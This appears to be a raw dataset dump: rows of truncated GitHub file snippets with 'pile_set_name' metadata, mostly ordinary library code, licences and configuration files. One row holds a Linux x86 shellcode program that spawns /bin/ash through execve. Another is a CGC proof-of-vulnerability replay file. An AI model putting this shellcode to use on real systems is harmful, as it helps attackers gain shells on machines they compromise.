text
stringlengths
2
99.9k
meta
dict
var Glob = require('../glob.js').Glob; var test = require('tap').test; test('new glob, with cb, and no options', function (t) { new Glob(__filename, function(er, results) { if (er) throw er; t.same(results, [__filename]); t.end(); }); });
{ "pile_set_name": "Github" }
/* * Copyright (c) 2014-2018, Arm Limited and affiliates. * SPDX-License-Identifier: BSD-3-Clause * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyri...
{ "pile_set_name": "Github" }
<?xml version="1.0" standalone="no" ?> <!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd"><pov> <cbid>CROMU_00011</cbid> <replay> <read echo="ascii"><delim> </delim><match><data>\x3E </data></match></read> <write echo="ascii"><data>p12Pe = |"cOw","92lA3Ge","cpWipF","agm","OuKtl","1FU4"|^|"I7","agm","IkJw9ym"|\...
{ "pile_set_name": "Github" }
# InterviewPython 学习 ## 干货 [【GitHub】awesome-python](https://github.com/vinta/awesome-python) [【GitHub】Python初学者](https://github.com/Yixiaohan/codeparkshare) [【公众号】Python开发者](http://mp.weixin.qq.com/profile?src=3&timestamp=1563673765&ver=1&signature=TQ4Qya7gl94apqLCNkFNSrJGqwLjqxPJKWkefqoDFRYOzGzCs78LYq0MlwNL3B2*v...
{ "pile_set_name": "Github" }
dnl ARM v6t2 mpn_divrem_1 and mpn_preinv_divrem_1. dnl Contributed to the GNU project by Torbjörn Granlund. dnl Copyright 2012 Free Software Foundation, Inc. dnl This file is part of the GNU MP Library. dnl dnl The GNU MP Library is free software; you can redistribute it and/or modify dnl it under the terms of...
{ "pile_set_name": "Github" }
// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package x509 import ( "crypto/ecdsa" "crypto/elliptic" "encoding/asn1" "errors" "fmt" "math/big" ) const ecPrivKeyVersion = 1 // ecPrivateKey reflects ...
{ "pile_set_name": "Github" }
# Copyright 2019 The pybadge Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in ...
{ "pile_set_name": "Github" }
/* * GeoTools - The Open Source Java GIS Toolkit * http://geotools.org * * (C) 2005-2008, Open Source Geospatial Foundation (OSGeo) * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free ...
{ "pile_set_name": "Github" }
/* * Azureus - a Java Bittorrent client * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License. * * This program is distributed in the hope that it will be usef...
{ "pile_set_name": "Github" }
// // detail/object_pool.hpp // ~~~~~~~~~~~~~~~~~~~~~~ // // Copyright (c) 2003-2018 Christopher M. Kohlhoff (chris at kohlhoff dot com) // // Distributed under the Boost Software License, Version 1.0. (See accompanying // file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) // #ifndef ASIO_DETAIL_OBJ...
{ "pile_set_name": "Github" }
/* Copyright 2014 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, ...
{ "pile_set_name": "Github" }
#ifndef AUTH_REQUEST_HANDLER_PRIVATE_H #define AUTH_REQUEST_HANDLER_PRIVATE_H struct auth_request; struct auth_client_connection; struct auth_request_handler { int refcount; pool_t pool; HASH_TABLE(void *, struct auth_request *) requests; unsigned int connect_uid, client_pid; auth_client_request_callbac...
{ "pile_set_name": "Github" }
/* * File : TorrentUtils.java * Created : 13-Oct-2003 * By : stuff * * Azureus - a Java Bittorrent client * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of ...
{ "pile_set_name": "Github" }
library(xtable) library(openintro) d <- loans_full_schema d$past_bankr <- (d$public_record_bankrupt > 0) + 0 myPDF("intRateVsPastBankrScatter.pdf", 4.2, 4, mar = c(3.7, 3.7, 0, 0.5), mgp = c(2.5,0.55,0)) plot(d$past_bankr, d$interest_rate, xlim = c(-0.15, 1.15), axes = FALSE, type = "n", ...
{ "pile_set_name": "Github" }
{ "title":"JavaScript modules via script tag", "description":"Loading JavaScript module scripts using `<script type=\"module\">` Includes support for the `nomodule` attribute.", "spec":"https://html.spec.whatwg.org/multipage/scripting.html#attr-script-type", "status":"ls", "links":[ { "url":"https:/...
{ "pile_set_name": "Github" }
24F00: Ideograma sū 24F01: Ideograma méng 24F02: Ideograma xiǎn 24F03: Ideograph Lòng 24F04: 24F05: Ideograma qì 24F06: 24F07: 24F08: 24F09: 24F0A: 24F0B: Ideograph Chàn 24F0C: Ideograma yì 24F0D: Ideograma háng 24F0E: Ideograma mak6 24F0F: Liografía de ideografía 24F10: Ideograma guán 24F11: 24F12: Ideograph wěi 24F13...
{ "pile_set_name": "Github" }
{ "info": { "health": { "address": 16775198, "type": "|i1" }, "score": { "address": 16775201, "type": "|d1" } } }
{ "pile_set_name": "Github" }
/*!The Treasure Box Library * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in wr...
{ "pile_set_name": "Github" }
/* * Generated by util/mkerr.pl DO NOT EDIT * Copyright 1995-2018 The OpenSSL Project Authors. All Rights Reserved. * * Licensed under the OpenSSL license (the "License"). You may not use * this file except in compliance with the License. You can obtain a copy * in the file LICENSE in the source distribution or...
{ "pile_set_name": "Github" }
// // EXPRuntimeMatcher.h // Expecta // // Created by Luke Redpath on 26/03/2012. // Copyright (c) 2012 Peter Jihoon Kim. All rights reserved. // #import <Foundation/Foundation.h> #import "EXPMatcher.h" #import "EXPDefines.h" @interface EXPBlockDefinedMatcher : NSObject <EXPMatcher> { EXPBoolBlock prerequisiteB...
{ "pile_set_name": "Github" }
package cn.tycoding.biz.service.impl; import cn.hutool.core.date.DateUtil; import cn.tycoding.biz.entity.SysUser; import cn.tycoding.biz.mapper.UserMapper; import cn.tycoding.biz.service.UserService; import cn.tycoding.common.utils.Md5Util; import cn.tycoding.common.utils.SplineChart; import com.baomidou.mybatisplus.c...
{ "pile_set_name": "Github" }
var modes = require('js-git/lib/modes'); module.exports = function (repo, rootHash, onRootChange) { var writing = false; var writeLocks = {}; var readLocks = {}; var queue = []; return begin; function* begin(prefix, writable) { // Check and normalize inputs if (typeof prefix !== "string") { ...
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 98bf851c405704aa5a904a634e3096a9 MonoImporter: serializedVersion: 2 defaultReferences: [] executionOrder: 0 icon: {instanceID: 0} userData:
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <LanguageData> <crystalAbundanceSetting>Abundancia de cristales</crystalAbundanceSetting> <crystalDiversitySetting>Diversidad de cristales</crystalDiversitySetting> <boulderAbundanceSetting>Abundancia de rocas</boulderAbundanceSetting> <rocksAbundanceSetting>Abundancia de ...
{ "pile_set_name": "Github" }
Grover's Search Algorithm and Amplitude Amplification ===================================================== Overview -------- This module implements Grover's Search Algorithm, and the more general Amplitude Amplification Algorithm. Grover's Algorithm solves the following problem: Given a collection of basis states {...
{ "pile_set_name": "Github" }
<html> <head> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet"> <title>Greetings user</title> </head> <body> <div class="container"> <!-- the || is the logical operator OR --> <div v-if="gender== 'male' || gender == 'female'"> <h1>Hello, ...
{ "pile_set_name": "Github" }
var tape = require("tape"), geometric = require("../"); tape("lineMidpoint(line) calculates the midpoint of a line segment", function(test) { test.equal(geometric.lineMidpoint([[0, 0], [0, 1]])[0], 0); test.equal(geometric.lineMidpoint([[0, 0], [0, 1]])[1], .5); test.equal(geometric.lineMidpoint([[0, 0], [0,...
{ "pile_set_name": "Github" }
/* * Copyright (c) 2018, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Softwa...
{ "pile_set_name": "Github" }
package com.android.ims; import android.os.Message; import android.os.RemoteException; import android.telephony.Rlog; import android.telephony.ims.ImsReasonInfo; public class HwImsUtExImpl implements IHwImsUtEx { private static final String TAG = "HwImsUtExImpl"; private IHwImsUtManager imsUtManager; priv...
{ "pile_set_name": "Github" }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may ...
{ "pile_set_name": "Github" }
/* Copyright 2006-2012 Taco Hoekwater <taco@luatex.org> This file is part of LuaTeX. LuaTeX is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version...
{ "pile_set_name": "Github" }
%YAML 1.1 %TAG !u! tag:unity3d.com,2011: --- !u!30 &1 GraphicsSettings: m_ObjectHideFlags: 0 serializedVersion: 12 m_Deferred: m_Mode: 1 m_Shader: {fileID: 69, guid: 0000000000000000f000000000000000, type: 0} m_DeferredReflections: m_Mode: 1 m_Shader: {fileID: 74, guid: 0000000000000000f00000000...
{ "pile_set_name": "Github" }
using System; using System.ComponentModel; using System.Collections; using System.Diagnostics; using System.Text; using System.Windows.Forms; using System.Drawing; namespace AreaLightTest { public class PanelOutput : Panel { public PanelOutput() { InitializeComponent(); } public PanelOut...
{ "pile_set_name": "Github" }
.. wmd-relax documentation master file, created by sphinx-quickstart on Mon Jun 5 16:52:34 2017. You can adapt this file completely to your liking, but it should at least contain the root `toctree` directive. wmd-relax's documentation ========================= .. toctree:: :maxdepth: 2 :caption: Conte...
{ "pile_set_name": "Github" }
DROP VIEW IF EXISTS de_metas_invoicecandidate.c_invoice_candidate_failed_to_update_v; DROP VIEW IF EXISTS de_metas_invoicecandidate.c_invoice_candidate_missing_aggregation_group_v; CREATE OR REPLACE VIEW de_metas_invoicecandidate.c_invoice_candidate_missing_aggregation_group_v AS SELECT ic.c_invoice_candidate_id, i...
{ "pile_set_name": "Github" }
<component name="libraryTable"> <library name="Maven: org.apache.tiles:tiles-el:3.0.5"> <CLASSES> <root url="jar://$MAVEN_REPOSITORY$/org/apache/tiles/tiles-el/3.0.5/tiles-el-3.0.5.jar!/" /> </CLASSES> <JAVADOC> <root url="jar://$MAVEN_REPOSITORY$/org/apache/tiles/tiles-el/3.0.5/tiles-el-3.0.5...
{ "pile_set_name": "Github" }
import org.gradle.api.internal.HasConvention import org.jetbrains.kotlin.gradle.dsl.Coroutines import org.jetbrains.kotlin.gradle.dsl.KotlinJvmCompile import org.jetbrains.kotlin.gradle.plugin.KotlinSourceSet buildscript { repositories { mavenCentral() maven { setUrl("https://oss.sonatype.org/conte...
{ "pile_set_name": "Github" }
DA8XXEVM BOARD M: Nick Thompson <nick.thompson@gefanuc.com> S: Maintained F: board/davinci/da8xxevm/ F: include/configs/da830evm.h F: configs/da830evm_defconfig DA850_AM18XXEVM BOARD M: Sudhakar Rajashekhara <sudhakar.raj@ti.com> S: Maintained F: include/configs/da850evm.h F: configs/da850_am18xxevm_defconfig F: confi...
{ "pile_set_name": "Github" }
--loose-plugin-load-add=$HA_MROONGA_SO --loose-plugin-mroonga=ON
{ "pile_set_name": "Github" }
/* Copyright 2017 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, ...
{ "pile_set_name": "Github" }
(function() { var dfs = {"am_pm":["AM","PM"],"day_name":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"day_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"era":["BC","AD"],"era_name":["Before Christ","Anno Domini"],"month_name":["January","February","March","April","May","June","July","...
{ "pile_set_name": "Github" }
use super::*; use codec::{Decode, Encode}; #[derive(Clone, Eq, PartialEq, Encode, Decode, Hash)] #[cfg_attr(feature = "std", derive(Debug))] pub enum PredicateType { CompiledPredicate, IntermediateCompiledPredicate, AtomicProposition, AtomicPredicateCall, InputPredicateCall, VariablePredicateCa...
{ "pile_set_name": "Github" }
import site from '../../app'; site.controller('sharePromptController', ($scope, db, $mdDialog, $firebaseObject, title, defaultValue) => { const allUsers = $firebaseObject(db.ref('users')); $scope.cancel = $mdDialog.cancel; const success = (item) => $mdDialog.hide(item); $scope.title = title; $scope.share...
{ "pile_set_name": "Github" }
/** * @file bosh.h Bidirectional-streams over Synchronous HTTP (BOSH) (XEP-0124 and XEP-0206) * * purple * * Purple is the legal property of its developers, whose names are too numerous * to list here. Please refer to the COPYRIGHT file distributed with this * source distribution. * * This program is free sof...
{ "pile_set_name": "Github" }
package com.github.kpavlov.jreactive8583.it; import com.github.kpavlov.jreactive8583.ConnectorConfigurer; import com.github.kpavlov.jreactive8583.IsoMessageListener; import com.github.kpavlov.jreactive8583.client.Iso8583Client; import com.github.kpavlov.jreactive8583.server.Iso8583Server; import com.github.kpavlov.jre...
{ "pile_set_name": "Github" }
#!/usr/bin/env node var minimist = require('minimist') var ghauth = require('ghauth') var githubStandardLabels = require('./') var argv = minimist(process.argv.slice(2), { boolean: [ 'version', 'help' ] }) var usage = ` Usage: $ github-standard-labels <username> <project> Commands: <default...
{ "pile_set_name": "Github" }
--general-log --log-bin=mylog.log
{ "pile_set_name": "Github" }
package qualitycheck //Licensed under the Apache License, Version 2.0 (the "License"); //you may not use this file except in compliance with the License. //You may obtain a copy of the License at // //http://www.apache.org/licenses/LICENSE-2.0 // //Unless required by applicable law or agreed to in writing, software //...
{ "pile_set_name": "Github" }
<component name="ProjectCodeStyleConfiguration"> <code_scheme name="Project" version="173"> <Objective-C-extensions> <file> <option name="com.jetbrains.cidr.lang.util.OCDeclarationKind" value="Import" /> <option name="com.jetbrains.cidr.lang.util.OCDeclarationKind" value="Macro" /> <...
{ "pile_set_name": "Github" }
/* * Copyright Red Hat Inc. and/or its affiliates and other contributors * as indicated by the authors tag. All rights reserved. * * This copyrighted material is made available to anyone wishing to use, * modify, copy, or redistribute it subject to the terms and conditions * of the GNU General Public License vers...
{ "pile_set_name": "Github" }
#include "qsysinfo.h"
{ "pile_set_name": "Github" }
Container@GAMESAVE_LOADING_SCREEN: Logic: GameSaveLoadingLogic Width: WINDOW_RIGHT Height: WINDOW_BOTTOM Children: LogicKeyListener@CANCEL_HANDLER: Image@NOD: X: WINDOW_RIGHT / 2 - 384 Y: (WINDOW_BOTTOM - 256) / 2 ImageCollection: logos ImageName: nod-load Image@GDI: X: WINDOW_RIGHT / 2 + 128 ...
{ "pile_set_name": "Github" }
package com.argusapm.android.core.job.memory; import android.text.TextUtils; import com.argusapm.android.api.ApmTask; import com.argusapm.android.core.storage.DbHelper; import com.argusapm.android.core.storage.ITable; /** * @author ArgusAPM Team */ public class MemoryTable implements ITable { @Override pub...
{ "pile_set_name": "Github" }
/* * Linux x86 shellcode by bob from Dtors.net. * execve()/bin/ash; exit; * Total = 34 bytes. */ #include <stdio.h> char shellcode[]= "\x31\xc0\x50\x68\x2f\x61\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24" "\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd" "\x80\x31\xc0\xb0\x01\xcd\x80"; int ...
{ "pile_set_name": "Github" }
// // MASConstraintBuilder.h // Masonry // // Created by Jonas Budelmann on 20/07/13. // Copyright (c) 2013 cloudling. All rights reserved. // #import "MASConstraint.h" #import "MASUtilities.h" typedef NS_OPTIONS(NSInteger, MASAttribute) { MASAttributeLeft = 1 << NSLayoutAttributeLeft, MASAttributeRight =...
{ "pile_set_name": "Github" }
define( [ "../core", "../core/stripAndCollapse", "./support", "../core/nodeName", "../core/init" ], function( jQuery, stripAndCollapse, support, nodeName ) { "use strict"; var rreturn = /\r/g; jQuery.fn.extend( { val: function( value ) { var hooks, ret, isFunction, elem = this[ 0 ]; if ( !arguments.le...
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android"> <background android:drawable="@drawable/ic_launcher_background" /> <foreground android:drawable="@drawable/ic_launcher_foreground" /> </adaptive-icon>
{ "pile_set_name": "Github" }
/// Copyright 2015 Google Inc. All rights reserved. /// /// Licensed under the Apache License, Version 2.0 (the "License"); /// you may not use this file except in compliance with the License. /// You may obtain a copy of the License at /// /// http://www.apache.org/licenses/LICENSE-2.0 /// /// Unless required by...
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Module: Enumerable</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <link ...
{ "pile_set_name": "Github" }
// ======================================================================== // // Copyright 2009-2013 Intel Corporation // // // // Licensed under the Apache License, Version 2.0 (the "License"); // // y...
{ "pile_set_name": "Github" }
/* Copyright 2018 The Kubernetes Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, ...
{ "pile_set_name": "Github" }
export const environment = { production: true };
{ "pile_set_name": "Github" }
# accepts [![NPM Version][npm-version-image]][npm-url] [![NPM Downloads][npm-downloads-image]][npm-url] [![Node.js Version][node-version-image]][node-version-url] [![Build Status][travis-image]][travis-url] [![Test Coverage][coveralls-image]][coveralls-url] Higher level content negotiation based on [negotiator](https...
{ "pile_set_name": "Github" }
/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.network.v2018_06_01.implementation; import com.m...
{ "pile_set_name": "Github" }
<?php namespace Ichtrojan\Location\Http\Controllers; use Ichtrojan\Location\Models\City; use Ichtrojan\Location\Models\State; use Ichtrojan\Location\Models\Country; use Illuminate\Http\JsonResponse; class LocationController extends Controller { /** * @return JsonResponse */ public function getCountr...
{ "pile_set_name": "Github" }
schedule: program->configApplyDirection("s1", "DensePull")->configApplyParallelization("s1", "dynamic-vertex-parallel"); program->configApplyParallelization("s2","serial");
{ "pile_set_name": "Github" }
# Copyright 2019 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applica...
{ "pile_set_name": "Github" }
<?xml version="1.0"?> <ZopeData> <record id="1" aka="AAAAAAAAAAE="> <pickle> <global name="File" module="OFS.Image"/> </pickle> <pickle> <dictionary> <item> <key> <string>_Cacheable__manager_id</string> </key> <value> <string>http_cache</string> </value> ...
{ "pile_set_name": "Github" }
{{#> page-header-brand}} {{#> page-header-brand-toggle}} {{#> button button--modifier="pf-m-plain" button--attribute=(concat 'id="' page--id '-nav-toggle" aria-label="Global navigation" aria-expanded="true" aria-controls="' page--id '-primary-nav"')}} <i class="fas fa-bars" aria-hidden="true"></i> {{/bu...
{ "pile_set_name": "Github" }
org.gradle.jvmargs=-Xmx1536M android.enableR8=true android.useAndroidX=true android.enableJetifier=true
{ "pile_set_name": "Github" }
/* * JBoss, Home of Professional Open Source * Copyright 2011, Red Hat, Inc. and individual contributors * by the @authors tag. See the copyright.txt in the distribution for a * full listing of individual contributors. * * This is free software; you can redistribute it and/or modify it * under the terms of the G...
{ "pile_set_name": "Github" }
<?php namespace JMS\Serializer\Builder; use Doctrine\Common\Annotations\Reader; use Metadata\Driver\DriverInterface; interface DriverFactoryInterface { /** * @param array $metadataDirs * @param Reader $annotationReader * * @return DriverInterface */ public function createDriver(array...
{ "pile_set_name": "Github" }
$(document).ready(function() { module("ice core"); test("InlineChangeEditor.constructor", function() { // Setup for empty element. el = jQuery('<div></div>'); changeEditor = getIce(el); ok(el.find('p').length === 1, 'Paragraph was added to empty element.'); ok(el.find('p')[0] === changeEdito...
{ "pile_set_name": "Github" }
subroutine stencilf(A, B, N, iters) integer N, iters double precision A(N,N,N), B(N,N,N) integer i,j,k,z double precision c c = 1 / 7. do z=1,iters do k=2,N-1 do j=2,N-1 do i=2,N-1 A(i,j,k) = c * (B(i,j,k) + B(i+1,...
{ "pile_set_name": "Github" }
from __future__ import division, absolute_import, print_function import sys from numpy.distutils.fcompiler import FCompiler compilers = ['NAGFCompiler'] class NAGFCompiler(FCompiler): compiler_type = 'nag' description = 'NAGWare Fortran 95 Compiler' version_pattern = r'NAGWare Fortran 95 compiler Relea...
{ "pile_set_name": "Github" }
# del name x = 1 print(x) del x try: print(x) except NameError: print("NameError") try: del x except: # NameError: # FIXME uPy returns KeyError for this print("NameError") class C: def f(): pass
{ "pile_set_name": "Github" }
/** * Copyright (C) 2013-2014 EaseMob Technologies. All rights reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * http://www.apache.org/licenses/LICENSE-2.0 * Unless requi...
{ "pile_set_name": "Github" }
// Copyright 2017 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "components/download/public/common/download_job_factory.h" #include <memory> #include "components/download/internal/common/download_job_impl.h"...
{ "pile_set_name": "Github" }
// Copyright (c) 2017 Uber Technologies, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or a...
{ "pile_set_name": "Github" }
# OpenAL config file. Options that are not under a block or are under the # [general] block are for general, non-backend-specific options. Blocks may # appear multiple times, and duplicated options will take the last value # specified. # The system-wide settings can be put in /etc/openal/alsoft.conf and user- # specifi...
{ "pile_set_name": "Github" }
function s=mergestruct(s1,s2) % % s=mergestruct(s1,s2) % % merge two struct objects into one % % authors:Qianqian Fang (fangq<at> nmr.mgh.harvard.edu) % date: 2012/12/22 % % input: % s1,s2: a struct object, s1 and s2 can not be arrays % % output: % s: the merged struct object. fields in s1 and s2 will be comb...
{ "pile_set_name": "Github" }
[preset00] fRating=2.000000 fGammaAdj=1.7 fDecay=0.94 fVideoEchoZoom=1 fVideoEchoAlpha=0 nVideoEchoOrientation=0 nWaveMode=0 bAdditiveWaves=1 bWaveDots=0 bWaveThick=0 bModWaveAlphaByVolume=0 bMaximizeWaveColor=0 bTexWrap=1 bDarkenCenter=0 bRedBlueStereo=0 bBrighten=0 bDarken=0 bSolarize=0 bInvert=0 ...
{ "pile_set_name": "Github" }
/******************************************************************************* * Copyright 2011, 2012, 2013 fanfou.com, Xiaoke, Zhang * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at *...
{ "pile_set_name": "Github" }
/******************************************************************************* * AMetal * ---------------------------- * innovating embedded platform * * Copyright (c) 2001-2018 Guangzhou ZHIYUAN Electronics Co., Ltd. * All rights reserved. *...
{ "pile_set_name": "Github" }
"use strict"; exports.__esModule = true; var _getIterator2 = require("babel-runtime/core-js/get-iterator"); var _getIterator3 = _interopRequireDefault(_getIterator2); exports.findParent = findParent; exports.find = find; exports.getFunctionParent = getFunctionParent; exports.getStatementParent = getStatementParent;...
{ "pile_set_name": "Github" }
The squirrel headers #define type , which plays havoc with other headers that use type as a variable name or structure member. Move other headers before the offending squirrel header. In file included from /usr/include/c++/v1/math.h:310: /usr/include/c++/v1/limits:232:90: error: member reference base type 'int' is not...
{ "pile_set_name": "Github" }
// // UserExtensionsSpec.swift // Rocket.ChatTests // // Created by Matheus Cardoso on 12/6/17. // Copyright © 2017 Rocket.Chat. All rights reserved. // import Foundation import RealmSwift import XCTest @testable import Rocket_Chat class UserExtensionsSpec: XCTestCase { func testSearchUsernameContaining() { ...
{ "pile_set_name": "Github" }
// Playtune bytestream for file "..\..\Downloads\Good Midi\Overworld.mid" created by MIDITONES V1.14 on Sun Mar 5 00:09:03 2017 #include <Arduino.h> const unsigned char PROGMEM score [] = { 0xC0,48, 0x90,66,127, 0xC1,48, 0x91,62,127, 0xC2,48, 0x92,38,127, 0xC3,48, 0x93,38,127, 0,222, 0x92,45,127, 0,222, 0x92,50,127,...
{ "pile_set_name": "Github" }
<html> <body> <marquee><marquee></marquee><img></marquee> </body> </html>
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: f3e012b515ad7934fa176c53bf8c2d1f ModelImporter: serializedVersion: 25 internalIDToNameTable: - first: 74: 3227033691032222008 second: Katana|KatanaAction externalObjects: {} materials: importMaterials: 1 materialName: 0 materialSearch: 1 materialLocation: 1...
{ "pile_set_name": "Github" }
/** * @file <argos3/plugins/simulator/sensors/ground_rotzonly_sensor.h> * * @author Carlo Pinciroli - <ilpincy@gmail.com> */ #ifndef GROUND_ROTZONLY_SENSOR_H #define GROUND_ROTZONLY_SENSOR_H #include <string> #include <map> namespace argos { class CGroundRotZOnlySensor; class CGroundSensorEquippedEntity; ...
{ "pile_set_name": "Github" }
#include "../../util/kvm-stat.h" #include <asm/kvm_perf.h> define_exit_reasons_table(vmx_exit_reasons, VMX_EXIT_REASONS); define_exit_reasons_table(svm_exit_reasons, SVM_EXIT_REASONS); static struct kvm_events_ops exit_events = { .is_begin_event = exit_event_begin, .is_end_event = exit_event_end, .decode_key = exi...
{ "pile_set_name": "Github" }
/** * Copyright (c) 2011-2021, James Zhan 詹波 (jfinal@126.com). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless...
{ "pile_set_name": "Github" }
// cgo -godefs types_openbsd.go | go run mkpost.go // Code generated by the command above; see README.md. DO NOT EDIT. // +build amd64,openbsd package unix const ( SizeofPtr = 0x8 SizeofShort = 0x2 SizeofInt = 0x4 SizeofLong = 0x8 SizeofLongLong = 0x8 ) type ( _C_short int16 _C_int ...
{ "pile_set_name": "Github" }
/** * Aptana Studio * Copyright (c) 2005-2011 by Appcelerator, Inc. All Rights Reserved. * Licensed under the terms of the GNU Public License (GPL) v3 (with exceptions). * Please see the license.html included with this distribution for details. * Any modifications to this file must keep this entire header intact. ...
{ "pile_set_name": "Github" }
gradoop-flink Copyright 2014-2019 Leipzig University (Database Research Group) This project bundles the following dependencies under the Apache Software License 2.0 (http://www.apache.org/licenses/LICENSE-2.0.txt) - me.lemire.integercompression:JavaFastPFOR:0.1.10 - me.lemire.integercompression:IntCompressor:0.1.10 -...
{ "pile_set_name": "Github" }
// Copyright 2014 The oauth2 Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package oauth2 provides support for making // OAuth2 authorized and authenticated HTTP requests. // It can additionally grant authorization with Bearer J...
{ "pile_set_name": "Github" }
/* Interface to functions for deciding which macros are currently in scope. Copyright (C) 2002-2020 Free Software Foundation, Inc. Contributed by Red Hat, Inc. This file is part of GDB. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public Lic...
{ "pile_set_name": "Github" }
#------------------------------------------------------------------------------ # File: ID3.pm # # Description: Read ID3 meta information # # Revisions: 09/12/2005 - P. Harvey Created # # References: 1) http://www.id3.org/ # 2) http://www.mp3-tech.org/ # 3) http://www.fortuneci...
{ "pile_set_name": "Github" }
/* ----------------------------------------------------------------------------- This source file is part of OGRE (Object-oriented Graphics Rendering Engine) For the latest info, see http://www.ogre3d.org/ Copyright (c) 2000-2014 Torus Knot Software Ltd Permission is hereby granted, free of charge, to any person ...
{ "pile_set_name": "Github" }